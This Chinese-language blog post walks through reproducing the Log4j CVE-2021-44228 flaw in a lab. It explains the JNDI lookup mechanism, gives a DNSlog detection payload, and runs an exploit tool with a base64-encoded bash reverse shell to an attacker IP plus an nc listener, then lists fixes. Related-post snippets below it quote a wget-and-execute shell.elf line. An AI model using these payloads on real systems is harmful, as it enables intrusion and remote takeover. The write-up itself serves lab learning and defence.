LOG4J(CVE-2021-44228)-靶场复现

最新推荐文章于 2024-05-28 09:08:35 发布
最新推荐文章于 2024-05-28 09:08:35 发布
阅读量256 收藏
点赞数
文章标签: log4j web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66376444/article/details/129982574
版权

一、漏洞信息
1、log4j介绍:
Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)

2、漏洞原理:
①当用户输入信息时,应用程序中的log4j2组件会将信息记录到日志中,假如日志中含有该语句${jndi:rmi://4rujx1.dnslog.cn/bug},log4j就会去解析该信息。
②通过jndi的lookup()方法去解析该URL:jndi:rmi://4rujx1.dnslog.cn/bug,解析到rmi,就会去4rujx1.dnslog.cn的rmi服务找名为bug的资源,如果找不到就会去http服务中找。
③在http中找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会下载下来,然后发现bug是一个.class文件,就会去执行里面的代码,从而实现注入攻击者就可以通过shell实现任意的命令执行,造成严重危害。

3、影响版本:
Apache Log4j2是一款使用非常广泛的Java日志框架。2021年12月9日,Apache Log4j2爆出存在远程代码执行漏洞,由于Apache Log4j2广泛地应用在各种Web程序中,该漏洞涉及用户量较大,危害性非常之高,漏洞影响版本为2.0~2.14.1。

二、漏洞复现
1.获取子域


2.构造payload

payload:${jndi:rmi://t5vpvk.dnslog.cn/exp}


3.在DNSlog网站点击刷新记录,既可以发现一条DNS查询的记录(这里可能存在一些延迟,需要一些时间等待)。发现存在记录的话,就说明存在cve-2021-44228漏洞。

4.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启LDAP、HTTP服务。这里-A参数是开启LDAP、HTTP服务的ip地址。

payload:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zMy82NjY2IDA+JjEK}|{base64,-d}|{bash,-i}' -A 10.10.16.33


5.kali使用nc开启监听

6.重新发送payload,url编码一下

7.成功获取到了shell

三、修复建议
1、将Apache Log4j所有相关应用到Apache Log4j 2.3.1版本。
2、过滤用户输入(ldap、rmi、dns)。
3、禁止log4j使用lookup方法。

wudidaniuniu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Apache Log4j-漏洞复现CVE-2021-44228
千寻的博客
12-22 3124
文章目录漏洞描述漏洞编号影响范围FOFA环境搭建漏洞复现漏洞复现-反弹shell参考连接摘抄 漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。 该工具重写了Log4j框架,并且引入了大量丰富的特性。 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 该日志框架被大量用于业务系统开发,用来记录日志信息。 Apace在其2.0到2.14.1版本中存在一
CVE-2021-44228 Log4j 复现及原理
weixin_45260839的博客
05-08 2036
CVE-2021-44228 Log4j 复现及原理
log4j漏洞复现
xxx_678的博客
03-18 1034
加粗字体解码后:wget http://123.56.136.50/ccccc/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf。https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip //github下载地址。视频地址:https://www.youtube.com/watch?
log4j2 远程代码执行漏洞复现CVE-2021-44228
Welcome To Myon'Blog !
03-08 3250
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
Apache Log4j 复现靶场
hackzkaq的博客
12-14 3281
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 安全圈大动荡,新出现的漏洞危害性极大,此漏洞是可以执行任意代码,群里也流传了一句话:“这已经相当于黑客已经攻入计算机,可以为所欲为了“.很恐怖,一个漏洞的出现让多少人手忙脚乱。 新出了漏洞很多人都会想着去复现漏洞,为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入复现,亲测可以直接拿shell。切记要遵守网络安全靶场复现地址:https://hack.zkaq.cn/battle/target?id=5
[WEB攻防]Apache log4j2 远程代码漏洞(CVE-2021-44228)安鸾靶场复现 +学习过程
AAAAAAAAAAAA66的博客
01-25 2000
中华人民共和国网络安全法(出版物)_360百科 其实搭建好环境,再利用其实很快能复现,但对我来说就是配置各种环境(java ldap 防火墙……)麻烦,另外在网上也没找到write up ,所以只能找一些相关的来学习,虽然走了不少弯路,但也学到不少相关的技巧与知识。 目录 漏洞原理 复现过程 检测 利用 防御方法 总结 漏洞原理 官方: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。...
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5249
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
Log4j2远程代码执行漏洞靶场复现CVE-2021-44228
没事我溜达
11-02 2152
logger在执行日志的时候,就会执行中间的表达式,如表达式是JNDI就会远程下载文件到本地并执行。
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7556
log4j漏洞原理和靶场复现
log4j-CVE-2021-44228-vulhub复现
ANYOUZHEN的博客
06-03 609
使用kali上的vulhub去打开我们输入在kali当前终端输入docker-compose up -d --build启动靶场但是启动靶场时出现了报错问题,网上搜索解决方法解决方法:给管理权限在kali终端输入:sudo docker-compose up -d 下面可以看到靶场正在启动接着输入 http://127.0.0.1:8983/solr/#/可以看到靶场成功打开Dnslog测试DNSLog Platform //dnslog平台网址我们在kali上第二个窗口打开dnslog平台进行记录,点
Log4j拿shell(vulfocus靶场详细教程)
1
04-16 4467
直接在vulfocus起一个靶场环境 burp抓包,看到提示参数是payload dnslog验证 先来使用dnslog验证一下 ${jndi:ldap://“ip”/poc} 这里的ip是dnslog获取到的域名 生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限 反弹shell vps开启监听 nc -lvnp 2333 使用工具:https://github.com/Zard-ethan/JNDI-I.
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 678
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4022
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
代码质量与可维护性提升
最新发布
偏执的小男孩儿
05-28 871
代码质量与可维护性提升
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值